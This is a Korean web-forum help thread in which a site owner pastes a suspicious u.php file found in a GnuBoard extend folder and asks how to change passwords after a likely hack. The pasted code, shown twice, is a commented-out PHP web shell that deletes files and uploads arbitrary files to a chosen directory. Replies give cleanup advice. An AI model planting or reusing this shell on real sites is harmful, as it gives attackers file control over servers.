extend 폴더에 이상한 파일이 생겼더라구요... 정보
extend 폴더에 이상한 파일이 생겼더라구요...본문
u.php 파일이 생겼고.
아래와 같은 소스가 들어가 있더라구요.
이것때문에 오류가 나와서주석처리를 했구요..
검색해보니 해킹당했을수 있다고 하더라구요?
그래서 디비 랑 ftp 비번 바꿀려고 하는데요..
디비 비번 바꿨을때
dbconfig.php 파일에서 바뀐 디비 비밀 번호만 바꿔주면 되는건가요?
<?/*
if(!$dir){
$dir = "./";
}
if ($_GET["cmd"] == "ping") {
echo "ok";
exit;
}
else if ($_GET["cmd"] == "delete") {
$path = $dir.$_GET["fileN"];
unlink($path);
echo "ok";
exit;
}
if($_FILES){
if(!is_dir($dir)){
if(!mkdir($dir)){
echo ("<script>alert('디렉토리 생성불가.');history.back();</script>");
exit;
}
}
if(!move_uploaded_file($_FILES["fileN"]["tmp_name"], $dir.$_FILES["fileN"]["name"] )){
echo ("<script>alert('지정한 위치로 이동 불가.');history.back();</script>");
exit;
}else{
echo ("업로드 되었습니다.");
exit;
}
}*/
?>
<!--<script>
function checkFirst(form){
if(!form.fileN.value){
alert('파일을 선택하시오.');
form.fileN.focus();
return;
}
showHuman('d');
form.submit();
}
function showHuman(r1){
if(r1 == "s"){
var view = "";
var view1 = "none";
}else{
var view = "none";
var view1 = "";
}
var object = eval("document.all.submit_ing");
object.style.display=view;
var object = eval("document.all.submit_ing_re");
object.style.display=view1;
}
</script>
--><!--
<center>
<body bgcolor="#FFFFFF" onload="showHuman('s');">
<table cellpadding =1 cellspacing=1 border=0>
<form name="upFile" method="post" action="<?=$PHP_SELF?>?dir=<?=$_GET["dir"]?>" enctype="multipart/form-data">
<tr >
<td>
열기<input type="file" name="fileN" size=25><br>
</td>
</tr>
<tr id="submit_ing">
<td >
<input type="button" value="업로드!!" onclick="checkFirst(document.upFile);">
</td>
</tr>
<tr id="submit_ing_re" style="DISPLAY:none;">
<td>
<marquee>잠시만 기다려 주세요!! 입력중입니다.</marquee>
</td>
</tr>
</form>
</table>
</center>-->
아래와 같은 소스가 들어가 있더라구요.
이것때문에 오류가 나와서주석처리를 했구요..
검색해보니 해킹당했을수 있다고 하더라구요?
그래서 디비 랑 ftp 비번 바꿀려고 하는데요..
디비 비번 바꿨을때
dbconfig.php 파일에서 바뀐 디비 비밀 번호만 바꿔주면 되는건가요?
<?/*
if(!$dir){
$dir = "./";
}
if ($_GET["cmd"] == "ping") {
echo "ok";
exit;
}
else if ($_GET["cmd"] == "delete") {
$path = $dir.$_GET["fileN"];
unlink($path);
echo "ok";
exit;
}
if($_FILES){
if(!is_dir($dir)){
if(!mkdir($dir)){
echo ("<script>alert('디렉토리 생성불가.');history.back();</script>");
exit;
}
}
if(!move_uploaded_file($_FILES["fileN"]["tmp_name"], $dir.$_FILES["fileN"]["name"] )){
echo ("<script>alert('지정한 위치로 이동 불가.');history.back();</script>");
exit;
}else{
echo ("업로드 되었습니다.");
exit;
}
}*/
?>
<!--<script>
function checkFirst(form){
if(!form.fileN.value){
alert('파일을 선택하시오.');
form.fileN.focus();
return;
}
showHuman('d');
form.submit();
}
function showHuman(r1){
if(r1 == "s"){
var view = "";
var view1 = "none";
}else{
var view = "none";
var view1 = "";
}
var object = eval("document.all.submit_ing");
object.style.display=view;
var object = eval("document.all.submit_ing_re");
object.style.display=view1;
}
</script>
--><!--
<center>
<body bgcolor="#FFFFFF" onload="showHuman('s');">
<table cellpadding =1 cellspacing=1 border=0>
<form name="upFile" method="post" action="<?=$PHP_SELF?>?dir=<?=$_GET["dir"]?>" enctype="multipart/form-data">
<tr >
<td>
열기<input type="file" name="fileN" size=25><br>
</td>
</tr>
<tr id="submit_ing">
<td >
<input type="button" value="업로드!!" onclick="checkFirst(document.upFile);">
</td>
</tr>
<tr id="submit_ing_re" style="DISPLAY:none;">
<td>
<marquee>잠시만 기다려 주세요!! 입력중입니다.</marquee>
</td>
</tr>
</form>
</table>
</center>-->
댓글 전체
ftp비번은 상관없고
db의 경우에 dbconfig.php 여기만 변경하시면 문제없습니다^^
db의 경우에 dbconfig.php 여기만 변경하시면 문제없습니다^^
db도 문제지만 전체적으로 숨겨져 있는 파일이 있는지 확인해 보고 또한 그누 역시 최신으로 업데이트를 해보세요. 소스를 보니 원하는 위치에 폴더 생성 및 파일 업로드가 가능합니다. 이미 db도 유출되었을 가능성이 큽니다. 피해를 더이상 없도록 막는 일이 필요할 것 같습니다. 해당파일은 주석처리가 아니라 삭제를 하시구요.
텔넷으로 접속하신후
ls -al 명령어를 이용하셔서 숨어있는 파일이 없는지 확인하셔야 합니다.
숨은파일 . 으로 시작하는 파일은 FTP 에서는 보이지 않습니다.
data 폴더와 extend 폴더 그리고 홈페이지최상단 폴더를 중점 점검하시면 좋습니다.
웹호스팅사에 이야기하셔서 서버 이전해달라고 하시는것이 좋을듯합니다.
물론 그누보드를 최신버전으로 업데이트 하는것도 잊지마시구요.
다른 웹프로그램이 설치된 경우라면 그것때문에 공격받을것일수 있습니다.
ls -al 명령어를 이용하셔서 숨어있는 파일이 없는지 확인하셔야 합니다.
숨은파일 . 으로 시작하는 파일은 FTP 에서는 보이지 않습니다.
data 폴더와 extend 폴더 그리고 홈페이지최상단 폴더를 중점 점검하시면 좋습니다.
웹호스팅사에 이야기하셔서 서버 이전해달라고 하시는것이 좋을듯합니다.
물론 그누보드를 최신버전으로 업데이트 하는것도 잊지마시구요.
다른 웹프로그램이 설치된 경우라면 그것때문에 공격받을것일수 있습니다.